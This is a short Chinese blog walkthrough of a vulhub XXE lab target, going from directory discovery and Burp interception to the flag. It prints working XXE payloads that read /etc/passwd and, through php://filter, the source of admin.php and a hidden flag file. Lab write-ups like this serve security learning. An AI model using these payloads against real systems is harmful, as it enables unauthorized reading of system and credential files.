vulhub xxe靶机

先用御剑扫描出ip然后进入网页

进入robots.txt里面会发现俩个目录然后我们进去xxe里面

进入xxe页面进行登录,burp抓包 

然后进入重放器

可以看到关于密码和用户名的是xml,那么就可以考虑用xxe注入

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>

 再修改xml处代码,我们还有一个线索可以用,是之前的admin.php,所以我们这么构造xml代码: 

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

可以看到有很多乱码,然后进行base64解码 

解码后发现还需要进行以此md5解码

然后我们进行登录

将admin.php改为flagmeout.php

进行base32解密 

解码出来是/etc/.flag.php然后重新修改xml

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>

然后得到一堆乱码

然后编成php文件进行访问

然后得到flag 

  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值